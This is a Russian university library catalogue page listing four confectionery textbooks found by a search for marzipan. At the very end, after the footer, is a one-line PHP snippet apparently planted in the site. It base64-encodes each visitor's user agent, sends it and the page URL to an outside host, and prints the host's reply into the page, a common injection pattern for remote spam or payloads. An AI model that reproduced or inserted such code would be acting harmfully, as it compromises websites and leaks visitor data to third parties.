Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

56 пользователей


Зарегистрированных: 1 

Киршин Александр Александрович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МАРЦИПАН")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 4
1. 
Бутейкис, Нина Григорьевна. Технология приготовления мучных кондитерских изделий [Текст] / Н. Г. Бутейкис ; дар. В. В. Арсеньев, 2009. - 300, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о сырье, предназначенном для изготовления хлебобулочных и кондитерских изделий, фаршей, кремов и различных полуфабрикатов, его подготовке и рациональном использовании, а также об изготовлении полуфабрикатов и готовых изделий и их отделке. Рассмотрена технология приготовления разнообразных хлебобулочных и кондитерских изделий, фаршей, кремов и полуфабрикатов, в том числе фирменных изделий из разных видов теста на предприятиях общественного питания.

В 7-е издание внесены изменения и дополнения, касающиеся использования в кондитерском производстве новых видов сырья и технологий новых изделий, по состояниию на 1 апреля 2008 г.

Для учащихся образовательных учреждений начального профессионального образования.

2. 
Пашук З. Н. Мучные кондитерские изделия [Текст] / З. Н. Пашук, Т. К. Апет, 1997. - 459 с.
Ключевые слова 
ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОИЗВОДСТВО КОНДИТЕРСКОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- МУКА -- КРАХМАЛ -- САХАР -- МЕД -- ПАТОКА -- ЯЙЦА -- МОЛОКО -- МАСЛО -- МАРГАРИН -- ЖИР -- ФРУКТЫ -- ЯГОДЫ -- РАЗРЫХЛИТЕЛЬ ТЕСТА -- ДОБАВКА АРОМАТИЧЕСКАЯ -- ДОБАВКА ВКУСОВАЯ -- ОРЕХИ -- МАК -- ПЕЧЕНЬЕ САХАРНОЕ -- ПЕЧЕНЬЕ ЗАТЯЖНОЕ -- ПЕЧЕНЬЕ СДОБНОЕ -- ГАЛЕТЫ -- КРЕКЕР -- ВЫПЕЧКА ПЕЧЕНЬЯ -- ПРЯНИК -- КЕКС -- БАБА РОМОВАЯ -- ТОРТ -- СИРОП -- ПОМАДА -- КАРАМЕЛЬ -- КАНДИР ДЛЯ САХАРНЫХ ФИГУР -- КРЕМ -- МАРЦИПАН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ - ТРЕБОВАНИЯ САНИТАРНЫЕ -- ПРАВИЛА ЛИЧНОЙ ГИГИЕНЫ -- СРЕДСТВА МОЮЩИЕ -- СРЕДСТВА ДЕЗИНФИЦИРУЮЩИЕ -- ОСМОТР МЕДИЦИНСКИЙ ЕЖЕСМЕННЫЙ -- ЛАМПА БАКТЕРИЦИДНАЯ
Держатели документа (Информация об экземплярах) 
3. 
Бурчакова И. Ю. Организация процесса приготовления и приготовление сложных хлебобулочных, мучных кондитерских изделий [Текст] / И. Ю. Бурчакова, С. В. Ермилова, 2014. - 384 с. : [8] вкл. цв. л. с.
Ключевые слова 
ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- МИНИ - ПЕКАРНЯ -- ОБОРУДОВАНИЕ МЕХАНИЧЕСКОЕ -- ОБОРУДОВАНИЕ СОРТИРОВОЧНО - КАЛИБРОВОЧНОЕ -- ОБОРУДОВАНИЕ МОЕЧНОЕ -- ОБОРУДОВАНИЕ МЕСИЛЬНО - ПЕРЕМЕШИВАЮЩЕЕ -- ОБОРУДОВАНИЕ ДОЗИРОВОЧНО - ФОРМОВОЧНОЕ -- ОБОРУДОВАНИЕ ИЗМЕЛЬЧИТЕЛЬНО-РЕЖУЩЕЕ -- ОБОРУДОВАНИЕ РАЗБРЫЗГИВАЮЩЕЕ -- ОБОРУДОВАНИЕ СПЕЦИАЛЬНОЕ -- ОБОРУДОВАНИЕ УПАКОВОЧНОЕ -- ОБОРУДОВАНИЕ ТЕПЛОВОЕ -- ОБОРУДОВАНИЕ ВАРОЧНОЕ -- ОБОРУДОВАНИЕ ДЛЯ РАССТОЙКИ ТЕСТОВЫХ ЗАГОТОВОК -- ОБОРУДОВАНИЕ ЖАРОЧНОЕ -- ПЛИТА -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ТРЕБОВАНИЯ САНИТАРНЫЕ -- КОНТРОЛЬ КАЧЕСТВА КОНДИТЕРСКИХ ИЗДЕЛИЙ -- СЫРЬЕ КОНДИТЕРСКОЕ -- ВЗАИМОЗАМЕНЯЕМОСТЬ СЫРЬЯ -- ПОЛУФАБРИКАТЫ КОНДИТЕРСКИЕ -- СИРОП -- ПОМАДА -- ЖЕЛЕ -- ГЛАЗУРЬ КОНДИТЕРСКАЯ -- КРЕМ -- МУСС -- КАРАМЕЛЬ -- МАРЦИПАН -- МАСТИКА САХАРНАЯ -- ПРАЛИНЕ -- ПОСЫПКА КОНДИТЕРСКАЯ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ СЛОЖНЫЕ -- ХЛЕБ ПРАЗДНИЧНЫЙ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ СЛОЖНЫЕ -- ПОЛУФАБРИКАТЫ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ ПРЯНИЧНЫЕ -- ТОРТЫ -- КАЧЕСТВО КОНДИТЕРСКИХ ИЗДЕЛИЙ -- ХРАНЕНИЕ КОНДИТЕРСКИХ ИЗДЕЛИЙ -- МЕРА - МАССА
Держатели документа (Информация об экземплярах) 
4. 
Шестакова Т. И. Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова, 2006. - 399 с.
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2874 - 23.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.61 с.12 запросов, 0.43c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;